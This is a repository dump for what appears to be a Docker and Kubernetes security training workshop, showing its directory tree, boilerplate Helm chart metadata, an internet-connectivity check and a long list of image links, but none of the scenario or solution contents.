├── gitbook ├── README.md ├── getting-started │ ├── setup-working-script.md │ ├── images │ │ ├── import.png │ │ ├── process.png │ │ ├── select-import.png │ │ └── kubectl-get-pods.png │ ├── internet-check.md │ ├── configure-kubectl.md │ ├── import-vm.md │ ├── vuln-apps.md │ └── kubernetes-cluster-setup.md ├── cover.jpg ├── extra │ ├── images │ │ ├── katacoda.png │ │ ├── contained-af.png │ │ ├── cgroup-with-shares.png │ │ ├── play-with-docker.png │ │ └── cgroup-with-out-shares.png │ ├── katacoda.md │ ├── contianed-af.md │ ├── play-with-docker.md │ ├── lsm.md │ ├── exploiting-cluster-secrets.md │ ├── play-with-kubernetes.md │ └── control-groups.md ├── intro │ ├── images │ │ ├── abhisek.png │ │ ├── warning.png │ │ └── madhuakula.png │ └── disclaimer.md ├── about-us │ ├── images │ │ ├── blackhat.png │ │ ├── logo_cka.png │ │ ├── logo_ckad.png │ │ ├── oscp-certs.png │ │ ├── troopers.png │ │ ├── about-appsecco.png │ │ ├── burp-suite-essentials.png │ │ └── security-automation-with-ansible2.png │ └── about-appsecco.md ├── deploy-app │ ├── images │ │ ├── helm-ls.png │ │ ├── delete-deploy.png │ │ ├── helm-deploy.png │ │ ├── helm-deploy-access.png │ │ ├── update-deployment.png │ │ └── deploy-app-get-pods.png │ ├── using-helm.md │ └── using-yaml.md ├── kubeaudit │ ├── images │ │ └── kubeaudit.png │ └── readme.md ├── scenario-2 │ ├── images │ │ ├── check-ip.png │ │ ├── app-login.png │ │ ├── discussion.png │ │ ├── flag-metadata.png │ │ ├── internal-metadata.png │ │ └── kube-env-metadata.png │ ├── discussion.md │ ├── solution.md │ └── scenario.md ├── scenario-3 │ ├── images │ │ ├── exec-pod.png │ │ ├── git-app.png │ │ ├── printenv.png │ │ ├── commit-log.png │ │ ├── discussion.png │ │ ├── default-svc.png │ │ └── revert-and-secrets.png │ ├── discussion.md │ ├── scenario.md │ └── solution.md ├── demos │ ├── images │ │ ├── CVE-2019-5736_1.gif │ │ └── CVE-2019-5736_2.gif │ ├── cve-2019-5736.md │ └── cve-2019-9901.md ├── scenario-1 │ ├── images │ │ ├── app-login.png │ │ ├── discussion.png │ │ ├── docker-config.png │ │ ├── pull-private-image.png │ │ ├── docker-registry-login.png │ │ ├── information-disclosure.png │ │ ├── source-code-hardcoded-key.png │ │ └── path-traversal-exploitation.png │ ├── discussion.md │ ├── scenario.md │ └── solution.md ├── scenario-4 │ ├── images │ │ ├── app-login.png │ │ ├── discussion.png │ │ ├── ping-google.png │ │ ├── download-docker.png │ │ ├── ping-google-id.png │ │ ├── host-docker-images.png │ │ ├── custom-docker-socket.png │ │ ├── extract-docker-binary.png │ │ └── host-docker-containers.png │ ├── discussion.md │ ├── scenario.md │ └── solution.md ├── scenario-5 │ ├── images │ │ ├── discussion.png │ │ ├── nmap-scan.png │ │ ├── get-ns-data.png │ │ ├── get-pod-name.png │ │ ├── mysql-access.png │ │ └── nmap-mysql-bruteforce.png │ ├── discussion.md │ ├── scenario.md │ └── solution.md ├── scenario-6 │ ├── images │ │ ├── deploy-pod.png │ │ ├── discussion.png │ │ ├── telnet-tiller.png │ │ ├── helm-deploy-pwnchart.png │ │ ├── helm-with-host-flag.png │ │ ├── kube-secrets-after-attack.png │ │ └── kubectl-secrets-before-attack.png │ ├── discussion.md │ ├── scenario.md │ └── solution.md ├── kube-hunter │ ├── images │ │ ├── get-ip-info.png │ │ ├── kube-hunter-results.png │ │ └── kube-hunter-external.png │ └── readme.md ├── environment-setup │ ├── images │ │ ├── ctf-ssh.png │ │ ├── import-ova.png │ │ ├── processing.png │ │ ├── student-ssh.png │ │ ├── vm-host-ssh.png │ │ ├── ctf-vm-login.png │ │ ├── vm-networking.png │ │ ├── ctf-ova-settings.png │ │ ├── select-ctf-ova.png │ │ ├── student-vm-login.png │ │ ├── select-student-ova.png │ │ ├── ssh-host-key-error.png │ │ └── student-ova-settings.png │ ├── common-troublehshooting-steps.md │ ├── ssh-into-machine.md │ └── importing-virtualmachines.md ├── kubernetes-101 │ ├── images │ │ ├── Kubernetes.png │ │ ├── nginx-site.png │ │ ├── after-docker.png │ │ ├── before-docker.png │ │ ├── kubectl-exec.png │ │ ├── kubectl-logs.png │ │ ├── kubectl-pods.png │ │ ├── kubectl-combined.png │ │ ├── kubectl-explain.png │ │ ├── kubectl-auth-can-i.png │ │ ├── kubectl-delete-pod.png │ │ ├── kubectl-namespace.png │ │ ├── kubectl-pods-wide.png │ │ ├── kubectl-cluster-info.png │ │ ├── kubectl-describe-pod.png │ │ ├── kubectl-deploy-portfwd.png │ │ └── kubectl-get-secret-yaml.png │ ├── children-guide.md │ └── readme.md ├── kubesec │ ├── images │ │ ├── secure-deployment.png │ │ └── insecure-deployment.png │ └── readme.md ├── advanced-concepts │ ├── images │ │ ├── docker-node.png │ │ ├── run-portainer.png │ │ ├── docker-networks.png │ │ ├── docker-volumes.png │ │ ├── portainer-select.png │ │ ├── portainer-setup.png │ │ ├── wordpress-site.png │ │ ├── docker-service-access.png │ │ ├── docker-service-create.png │ │ ├── portainer-dashboard.png │ │ └── docker-compose-wordpress.png │ ├── docker-volumes-and-networks.md │ ├── portainer.md │ ├── docker-volumes.md │ ├── docker-swarm.md │ └── docker-compoe-wordpress.md ├── kube-bench │ ├── images │ │ ├── get-kube-bench-pod.png │ │ └── kube-bench-results.png │ └── readme.md ├── sysdig-faclo │ ├── images │ │ ├── falco-detection.png │ │ ├── sysdig-falco-start.png │ │ ├── sysdig-falco-scenario.png │ │ └── container-and-commands.png │ └── README.md ├── apparmor-nginx-profile │ ├── images │ │ ├── lsm-after.png │ │ └── lsm-before.png │ └── README.md ├── docker-events │ ├── images │ │ └── docker-system-events.png │ └── README.md ├── docker-image-audit │ ├── images │ │ └── docker-history.png │ ├── scenario.md │ └── solution.md ├── logging-and-monitoring │ ├── images │ │ └── stack-driver.png │ └── readme.md ├── attacking-docker-containers │ ├── images │ │ ├── capsh-print.png │ │ ├── docker-nginx-1.png │ │ ├── docker-nginx-2.png │ │ ├── docker-pid-host.png │ │ ├── capabilities-ping.png │ │ ├── privileged-container.png │ │ ├── capabilities-ping-drop.png │ │ ├── privileged-container-kmsg.png │ │ └── docker-container-namespaces.png │ ├── README.md │ ├── misconfiguration.md │ ├── capabilities.md │ └── namespaces.md ├── attacking-private-registry │ ├── images │ │ ├── commit-log.png │ │ ├── pull-docker.png │ │ ├── revert-and-secrets.png │ │ ├── enter-into-container.png │ │ └── private-registry-list.png │ ├── scenario.md │ └── solution.md ├── auditing-docker-containers │ ├── images │ │ ├── docker-trust.png │ │ ├── docker-history.png │ │ ├── docker-data-files.png │ │ ├── docker-network-ls.png │ │ ├── docker-tcp-socket.png │ │ ├── docker-volume-ls.png │ │ ├── docker-diff-changes.png │ │ ├── docker-system-info.png │ │ ├── vulners-audit-site.png │ │ ├── docker-bench-security.png │ │ ├── docker-digest-images.png │ │ ├── docker-host-privileges.png │ │ ├── docker-network-inspect.png │ │ ├── docker-no-privileges.png │ │ ├── docker-perform-changes.png │ │ ├── docker-volume-inspect.png │ │ ├── knwon-vulnerabilities.png │ │ ├── docker-apparmor-profile.png │ │ ├── docker-image-packages-query.png │ │ ├── docker-inspect-for-socket.png │ │ └── docker-volume-sensitive-info.png │ ├── README.md │ ├── docker-integrity-check.md │ ├── amicontained.md │ ├── docker-runtime-endpoints.md │ ├── docker-bench-security-audit.md │ ├── docker-volumes-networks.md │ └── docker-images-containers.md ├── docker-logging │ ├── images │ │ └── docker-logs-with-filters.png │ └── README.md ├── getting-started-with-docker │ ├── images │ │ ├── docker-hub.png │ │ ├── docker-ps-a.png │ │ ├── docker-ps.png │ │ ├── docker-images.png │ │ ├── docker-history.png │ │ ├── nginxalpine-host.png │ │ ├── docker-build-image.png │ │ ├── docker-detach-logs.png │ │ ├── helloworld-docker.png │ │ ├── docker-architecture.png │ │ ├── docker-inspect-nginx.png │ │ ├── docker-search-wpscan.png │ │ ├── nginxalpine-container.png │ │ ├── docker-interactive-bash.png │ │ ├── docker-stop-and-remove.png │ │ └── docker-run-welcome-ubuntu.png │ ├── docker-management.md │ ├── dockerfile.md │ ├── docker-run.md │ └── README.md ├── attacking-containers-capabilities │ ├── images │ │ ├── sysmon-top.png │ │ ├── sysmon-capsh.png │ │ ├── sysmon-access.png │ │ ├── start-nc-listener.png │ │ ├── sysmon-access-host-flag.png │ │ ├── sysmon-download-payload.png │ │ ├── sysmon-msfvenom-generate.png │ │ ├── sysmon-payload-execution.png │ │ └── sysmon-start-python-server.png │ └── scenario.md ├── docker-volumes-and-networks │ ├── scenario.md │ ├── images │ │ ├── docker-volume-inspect.png │ │ └── docker-volumes-data.png │ └── solution.md ├── attacking-insecure-volume-mounts │ ├── images │ │ ├── docker-client-file.png │ │ ├── nc-student-listen.png │ │ ├── insecure-mount-exploit.png │ │ ├── insecure-mount-node-app.png │ │ ├── insecure-mont-reverse-shell.png │ │ ├── insecure-mount-docker-socket.png │ │ ├── accessing-host-system-using-socket.png │ │ └── insecure-mount-vulnerable-parameter.png │ ├── scenario.md │ └── solution.md ├── exploiting-cluster-secrets │ ├── images │ │ ├── access-docker-swarm-app.png │ │ ├── access-docker-swarm-env.png │ │ ├── docker-swarm-search-locations.png │ │ └── docker-secrets-default-location.png │ ├── scenario.md │ └── solution.md ├── attacking-docker-misconfiguration │ ├── images │ │ ├── misconfig-nmap-scan.png │ │ ├── docker-tcp-host-access.png │ │ └── misconfig-curl-images.png │ ├── scenario.md │ └── solution.md ├── attacking-auditing-docker-registry │ ├── images │ │ ├── docker-analysis-secrets.png │ │ ├── docker-registry-access.png │ │ ├── download-image-locally.png │ │ ├── docker-registry-access-image.png │ │ ├── docker-system-info-registries.png │ │ └── docker-registry-config-secrets.png │ └── docker-registries.md ├── automated-defense-for-container-security │ └── demo.md ├── popular-attacks │ ├── metadata.md │ ├── dockerhub-190k.md │ ├── service-token.md │ ├── cryptojacking.md │ └── dockerhub.md └── automated-defense │ └── readme.md ├── infra-setup ├── Helm-Charts │ ├── README.md │ ├── server-health │ │ ├── Chart.yaml │ │ ├── .helmignore │ │ ├── templates │ │ │ ├── tests │ │ │ │ └── test-connection.yaml │ │ │ ├── service.yaml │ │ │ ├── _helpers.tpl │ │ │ ├── ingress.yaml │ │ │ ├── NOTES.txt │ │ │ └── deployment.yaml │ │ └── values.yaml │ ├── mailbox-service │ │ ├── Chart.yaml │ │ ├── .helmignore │ │ ├── templates │ │ │ ├── tests │ │ │ │ └── test-connection.yaml │ │ │ ├── service.yaml │ │ │ ├── _helpers.tpl │ │ │ ├── ingress.yaml │ │ │ ├── NOTES.txt │ │ │ └── deployment.yaml │ │ └── values.yaml │ └── connectivity-check │ │ ├── Chart.yaml │ │ ├── .helmignore │ │ ├── templates │ │ ├── tests │ │ │ └── test-connection.yaml │ │ ├── service.yaml │ │ ├── _helpers.tpl │ │ ├── ingress.yaml │ │ ├── NOTES.txt │ │ └── deployment.yaml │ │ └── values.yaml ├── README.md ├── helm-rbac │ └── helm-rbac.yaml ├── net-tools │ └── net-tools.yaml ├── apps-ingress │ └── apps-ingress.yaml ├── secrets-db-service │ └── secrets-db-service.yaml └── code-base │ └── code-base.yaml ├── .gitignore ├── github-images └── k8s-docker-github-background.png └── MIT-LICENSE.txt /gitbook/README.md: -------------------------------------------------------------------------------- 1 | ![cover page](cover.jpg) -------------------------------------------------------------------------------- /gitbook/getting-started/setup-working-script.md: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /infra-setup/Helm-Charts/README.md: -------------------------------------------------------------------------------- 1 | # Helm Charts 2 | 3 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | gitbook/_book/* 2 | *.pdf 3 | *.epub 4 | *.mobi 5 | 6 | infra-setup/k8s-training-kubeconfig 7 | infra-setup/destroy.sh 8 | -------------------------------------------------------------------------------- /gitbook/cover.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/cover.jpg -------------------------------------------------------------------------------- /gitbook/extra/images/katacoda.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/extra/images/katacoda.png -------------------------------------------------------------------------------- /gitbook/intro/images/abhisek.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/intro/images/abhisek.png -------------------------------------------------------------------------------- /gitbook/intro/images/warning.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/intro/images/warning.png -------------------------------------------------------------------------------- /infra-setup/Helm-Charts/server-health/Chart.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | appVersion: "1.0" 3 | description: A Helm chart for Kubernetes 4 | name: server-health 5 | version: 0.1.0 6 | -------------------------------------------------------------------------------- /gitbook/intro/images/madhuakula.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/intro/images/madhuakula.png -------------------------------------------------------------------------------- /infra-setup/Helm-Charts/mailbox-service/Chart.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | appVersion: "1.0" 3 | description: A Helm chart for Kubernetes 4 | name: mailbox-service 5 | version: 0.1.0 6 | -------------------------------------------------------------------------------- /gitbook/about-us/images/blackhat.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/about-us/images/blackhat.png -------------------------------------------------------------------------------- /gitbook/about-us/images/logo_cka.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/about-us/images/logo_cka.png -------------------------------------------------------------------------------- /gitbook/about-us/images/logo_ckad.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/about-us/images/logo_ckad.png -------------------------------------------------------------------------------- /gitbook/about-us/images/oscp-certs.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/about-us/images/oscp-certs.png -------------------------------------------------------------------------------- /gitbook/about-us/images/troopers.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/about-us/images/troopers.png -------------------------------------------------------------------------------- /gitbook/deploy-app/images/helm-ls.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/deploy-app/images/helm-ls.png -------------------------------------------------------------------------------- /gitbook/extra/images/contained-af.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/extra/images/contained-af.png -------------------------------------------------------------------------------- /gitbook/kubeaudit/images/kubeaudit.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/kubeaudit/images/kubeaudit.png -------------------------------------------------------------------------------- /gitbook/scenario-2/images/check-ip.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-2/images/check-ip.png -------------------------------------------------------------------------------- /gitbook/scenario-3/images/exec-pod.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-3/images/exec-pod.png -------------------------------------------------------------------------------- /gitbook/scenario-3/images/git-app.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-3/images/git-app.png -------------------------------------------------------------------------------- /gitbook/scenario-3/images/printenv.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-3/images/printenv.png -------------------------------------------------------------------------------- /infra-setup/Helm-Charts/connectivity-check/Chart.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | appVersion: "1.0" 3 | description: A Helm chart for Kubernetes 4 | name: connectivity-check 5 | version: 0.1.0 6 | -------------------------------------------------------------------------------- /gitbook/demos/images/CVE-2019-5736_1.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/demos/images/CVE-2019-5736_1.gif -------------------------------------------------------------------------------- /gitbook/demos/images/CVE-2019-5736_2.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/demos/images/CVE-2019-5736_2.gif -------------------------------------------------------------------------------- /gitbook/scenario-1/images/app-login.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-1/images/app-login.png -------------------------------------------------------------------------------- /gitbook/scenario-1/images/discussion.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-1/images/discussion.png -------------------------------------------------------------------------------- /gitbook/scenario-2/images/app-login.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-2/images/app-login.png -------------------------------------------------------------------------------- /gitbook/scenario-2/images/discussion.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-2/images/discussion.png -------------------------------------------------------------------------------- /gitbook/scenario-3/images/commit-log.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-3/images/commit-log.png -------------------------------------------------------------------------------- /gitbook/scenario-3/images/discussion.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-3/images/discussion.png -------------------------------------------------------------------------------- /gitbook/scenario-4/images/app-login.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-4/images/app-login.png -------------------------------------------------------------------------------- /gitbook/scenario-4/images/discussion.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-4/images/discussion.png -------------------------------------------------------------------------------- /gitbook/scenario-5/images/discussion.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-5/images/discussion.png -------------------------------------------------------------------------------- /gitbook/scenario-5/images/nmap-scan.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-5/images/nmap-scan.png -------------------------------------------------------------------------------- /gitbook/scenario-6/images/deploy-pod.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-6/images/deploy-pod.png -------------------------------------------------------------------------------- /gitbook/scenario-6/images/discussion.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-6/images/discussion.png -------------------------------------------------------------------------------- /gitbook/about-us/images/about-appsecco.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/about-us/images/about-appsecco.png -------------------------------------------------------------------------------- /gitbook/deploy-app/images/delete-deploy.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/deploy-app/images/delete-deploy.png -------------------------------------------------------------------------------- /gitbook/deploy-app/images/helm-deploy.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/deploy-app/images/helm-deploy.png -------------------------------------------------------------------------------- /gitbook/extra/images/cgroup-with-shares.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/extra/images/cgroup-with-shares.png -------------------------------------------------------------------------------- /gitbook/extra/images/play-with-docker.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/extra/images/play-with-docker.png -------------------------------------------------------------------------------- /gitbook/getting-started/images/import.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/getting-started/images/import.png -------------------------------------------------------------------------------- /gitbook/getting-started/images/process.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/getting-started/images/process.png -------------------------------------------------------------------------------- /gitbook/kube-hunter/images/get-ip-info.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/kube-hunter/images/get-ip-info.png -------------------------------------------------------------------------------- /gitbook/scenario-1/images/docker-config.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-1/images/docker-config.png -------------------------------------------------------------------------------- /gitbook/scenario-2/images/flag-metadata.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-2/images/flag-metadata.png -------------------------------------------------------------------------------- /gitbook/scenario-3/images/default-svc.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-3/images/default-svc.png -------------------------------------------------------------------------------- /gitbook/scenario-4/images/ping-google.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-4/images/ping-google.png -------------------------------------------------------------------------------- /gitbook/scenario-5/images/get-ns-data.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-5/images/get-ns-data.png -------------------------------------------------------------------------------- /gitbook/scenario-5/images/get-pod-name.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-5/images/get-pod-name.png -------------------------------------------------------------------------------- /gitbook/scenario-5/images/mysql-access.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-5/images/mysql-access.png -------------------------------------------------------------------------------- /gitbook/scenario-6/images/telnet-tiller.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-6/images/telnet-tiller.png -------------------------------------------------------------------------------- /gitbook/environment-setup/images/ctf-ssh.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/environment-setup/images/ctf-ssh.png -------------------------------------------------------------------------------- /gitbook/getting-started/internet-check.md: -------------------------------------------------------------------------------- 1 | # Internet Check 2 | 3 | * Browse to [https://appsecco.com](https://appsecco.com) from you host browser 4 | * Run `curl ifconfig.co` from your virtual machines -------------------------------------------------------------------------------- /gitbook/kubernetes-101/images/Kubernetes.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/kubernetes-101/images/Kubernetes.png -------------------------------------------------------------------------------- /gitbook/kubernetes-101/images/nginx-site.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/kubernetes-101/images/nginx-site.png -------------------------------------------------------------------------------- /gitbook/kubesec/images/secure-deployment.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/kubesec/images/secure-deployment.png -------------------------------------------------------------------------------- /gitbook/scenario-4/images/download-docker.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-4/images/download-docker.png -------------------------------------------------------------------------------- /gitbook/scenario-4/images/ping-google-id.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-4/images/ping-google-id.png -------------------------------------------------------------------------------- /gitbook/advanced-concepts/images/docker-node.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/advanced-concepts/images/docker-node.png -------------------------------------------------------------------------------- /gitbook/deploy-app/images/helm-deploy-access.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/deploy-app/images/helm-deploy-access.png -------------------------------------------------------------------------------- /gitbook/deploy-app/images/update-deployment.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/deploy-app/images/update-deployment.png -------------------------------------------------------------------------------- /gitbook/environment-setup/images/import-ova.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/environment-setup/images/import-ova.png -------------------------------------------------------------------------------- /gitbook/environment-setup/images/processing.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/environment-setup/images/processing.png -------------------------------------------------------------------------------- /gitbook/environment-setup/images/student-ssh.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/environment-setup/images/student-ssh.png -------------------------------------------------------------------------------- /gitbook/environment-setup/images/vm-host-ssh.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/environment-setup/images/vm-host-ssh.png -------------------------------------------------------------------------------- /gitbook/extra/images/cgroup-with-out-shares.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/extra/images/cgroup-with-out-shares.png -------------------------------------------------------------------------------- /gitbook/getting-started/images/select-import.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/getting-started/images/select-import.png -------------------------------------------------------------------------------- /gitbook/kube-bench/images/get-kube-bench-pod.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/kube-bench/images/get-kube-bench-pod.png -------------------------------------------------------------------------------- /gitbook/kube-bench/images/kube-bench-results.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/kube-bench/images/kube-bench-results.png -------------------------------------------------------------------------------- /gitbook/kubernetes-101/images/after-docker.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/kubernetes-101/images/after-docker.png -------------------------------------------------------------------------------- /gitbook/kubernetes-101/images/before-docker.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/kubernetes-101/images/before-docker.png -------------------------------------------------------------------------------- /gitbook/kubernetes-101/images/kubectl-exec.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/kubernetes-101/images/kubectl-exec.png -------------------------------------------------------------------------------- /gitbook/kubernetes-101/images/kubectl-logs.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/kubernetes-101/images/kubectl-logs.png -------------------------------------------------------------------------------- /gitbook/kubernetes-101/images/kubectl-pods.png: -------------------------------------------------------------------------------- 